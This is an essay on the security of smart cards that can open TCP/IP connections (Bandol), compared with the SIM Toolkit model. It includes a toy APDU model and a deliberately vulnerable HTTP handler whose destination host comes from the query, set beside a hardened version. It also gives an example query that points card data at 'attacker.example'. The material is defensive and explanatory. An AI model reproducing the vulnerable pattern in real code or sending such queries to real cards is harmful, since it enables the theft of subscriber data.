In the current smart card application models, the card always acts as a server: it responds to requests from the card terminal and never speaks first. This has many advantages; for instance, the terminal can put the card in “sleep” mode when it does not need it.
Some may say that the SIM Toolkit framework is an exception to that rule, but it is not really one. The proactive commands, through which a card application may request operations from the terminal or the network, can only be sent in response to a command previously sent by the terminal. In SIM Toolkit, the card is not able to take the initiative and send a proactive command when it is not active.
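To make the “card as server” constraint concrete, here is an added toy model of the SIM Toolkit exchange (not Bandol code, not any real SIM implementation). The INS bytes and the 91 XX status word are those of GSM 11.14 / ETSI TS 102 223; the proactive command payload is a constructed, truncated DISPLAY TEXT, and the 6F 00 returned on a FETCH with nothing pending is a choice made for this model. The point it shows: an application can queue a proactive command whenever it likes, but the bytes only leave the card inside the response to a FETCH, and FETCH is sent by the terminal.

```python
"""Toy model of why a SIM Toolkit card cannot take the initiative (added example)."""
from collections import deque

CLA_GSM = 0xA0
INS_FETCH = 0x12              # terminal asks for the pending proactive command
INS_TERMINAL_RESPONSE = 0x14  # terminal reports the result of executing it
INS_ENVELOPE = 0xC2           # terminal pushes an event (SMS-PP, menu selection, ...)

# Constructed proactive command TLV: D0 len, command details (DISPLAY TEXT),
# device identities. A real one would also carry a text string TLV.
PROACTIVE_CMD = bytes.fromhex("d009" "8103012100" "82028102")

# Constructed terminal-side APDUs used below.
APDU_SELECT = bytes([CLA_GSM, 0xA4, 0x00, 0x00, 0x02])  # an ordinary, non-toolkit command
APDU_ENVELOPE = bytes([CLA_GSM, INS_ENVELOPE, 0x00, 0x00, 0x00])
APDU_FETCH = bytes([CLA_GSM, INS_FETCH, 0x00, 0x00, len(PROACTIVE_CMD)])


class ToolkitCard:
    """The card only ever answers APDUs. A proactive command is emitted only
    inside the response to a FETCH, never on the card's own initiative."""

    def __init__(self):
        self.pending = deque()   # proactive commands an application wants sent
        self.outbound = []       # everything that has actually left the card

    def application_wants(self, cmd):
        """A toolkit application decides it needs the terminal to do something.
        Nothing happens yet: the card has no channel on which to push it."""
        self.pending.append(cmd)

    def _status(self):
        # 91 XX: "a proactive command of XX bytes is waiting, please FETCH it".
        if self.pending:
            return bytes([0x91, len(self.pending[0])])
        return b"\x90\x00"

    def process(self, apdu):
        """Handle one command APDU from the terminal and return the response."""
        ins = apdu[1]
        if ins == INS_FETCH:
            if not self.pending:
                resp = b"\x6f\x00"   # nothing to fetch (error code chosen for this model)
            else:
                resp = self.pending.popleft() + b"\x90\x00"
        else:
            # ENVELOPE, TERMINAL RESPONSE or any other command: handle it,
            # then merely *signal* that something is pending in the status word.
            resp = self._status()
        self.outbound.append(resp)
        return resp


def run_exchange():
    """Drive one card through the cycle; returns (bytes sent before any
    terminal command, status after an ordinary command, FETCH response)."""
    card = ToolkitCard()
    card.application_wants(PROACTIVE_CMD)
    before = list(card.outbound)            # still empty: nothing has left the card
    status = card.process(APDU_SELECT)      # 91 0B: "come and get it"
    fetched = card.process(APDU_FETCH)      # the proactive command, at last
    return before, status, fetched
```

Even a second queued command only reaches the terminal after the terminal has sent another command: the card's whole contribution to "initiative" is a status word.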
In Bandol, the situation is different. TCP/IP, unlike ISO 7816, is quite symmetrical, and once the card is registered on the network it is possible for it to initiate a connection, at least in theory. This raises two questions, which I will try to answer: do we need that? Does it entail security issues?
First, do we need the card to initiate a transaction? Such an initiation can occur in two ways:
- As a response to an event coming from the outside. This case looks a lot like SIM Toolkit; the card does not really take the initiative, as it simply reacts to an outside event. There is however a major difference: the response is not necessarily targeted to the network node that triggered it.
- As a response to an internal event, usually a timer expiration. This does not look very applicable, because there is no real-time clock on the card. It may however happen as a late response to another event.
The main difference with SIM Toolkit is the ability for the card to initiate a connection with another entity. But even that is not all that new: on recent SIM cards, the BIP (Bearer Independent Protocol) allows Toolkit applications to (painfully) connect to the outside.
So, what’s new? The main difference comes from the way in which this connection can be established, and how available it will be. And that has an impact on security. Today, Toolkit applications are in most cases developed by the operator or by trusted partners, and there are relatively few such applications.
If cards become more open, which is one objective of Bandol, then the security issue will become the same as with any server: is it possible to convince this servlet to send me critical information? Can I modify the way in which it establishes some connections?
So, finally, the issue is not so much the fact that it is possible to open connections to the outside, but (1) the ease with which the applications are developed, and (2) the way in which people connect to the card application, since many more people know how to build problematic HTTP queries than ISO 7816 commands.
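The two questions above (can the servlet be talked into sending critical data, can the destination of its connections be changed) are exactly what an HTTP query can exercise. The following is an added example, not Bandol code or any real card application: a hypothetical `/report` handler on the card that opens an outbound connection, first with the destination taken from the query, then pinned to operator-provisioned endpoints with a per-endpoint field set. The card record, the endpoint names and the hosts are all constructed; outbound connections are modelled as returned (host, port) pairs so the code runs offline.

```python
"""Added example: a card-side HTTP handler that opens outbound connections,
in a query-controlled form and in a hardened form. All names are hypothetical."""
from urllib.parse import parse_qs, urlsplit

# Constructed stand-in for data the card application may report to its operator.
CARD_RECORD = {"iccid": "8933000000000000001", "balance": "12.50"}

# Hypothetical operator-provisioned destinations, each with the fields it may
# receive. The card may connect only to these.
ALLOWED_ENDPOINTS = {
    "billing": ("billing.operator.example", 443, ("iccid", "balance")),
    "support": ("support.operator.example", 443, ("iccid",)),
}


def parse_request_line(request_line):
    """Split 'GET /path?query HTTP/1.1' into (method, path, query dict)."""
    method, target, _version = request_line.split(" ", 2)
    parts = urlsplit(target)
    return method, parts.path, parse_qs(parts.query)


def vulnerable_report(request_line):
    """Destination taken from the query: whoever can send an HTTP request to
    the card decides where the card connects and ships the whole record there."""
    _method, path, qs = parse_request_line(request_line)
    if path != "/report":
        return {"status": 404}
    host = qs.get("to", [""])[0]
    port = int(qs.get("port", ["443"])[0])
    return {"status": 200, "connect": (host, port), "payload": dict(CARD_RECORD)}


def hardened_report(request_line):
    """The query may only *name* a provisioned endpoint. The card never connects
    to a host it was not configured with, only via POST, and sends only the
    fields that endpoint is entitled to."""
    method, path, qs = parse_request_line(request_line)
    if path != "/report":
        return {"status": 404}
    if method != "POST":
        return {"status": 405}   # a GET can be triggered by a mere link
    name = qs.get("endpoint", [""])[0]
    if name not in ALLOWED_ENDPOINTS:
        return {"status": 400}   # unknown destination: refuse, do not guess
    host, port, fields = ALLOWED_ENDPOINTS[name]
    payload = {k: CARD_RECORD[k] for k in fields}
    return {"status": 200, "connect": (host, port), "payload": payload}
```

The query `?to=attacker.example&port=8080` is trivial to craft in a browser or with curl, which is the author's point about HTTP versus ISO 7816; in the hardened handler the same query can at most pick one of the operator's own endpoints.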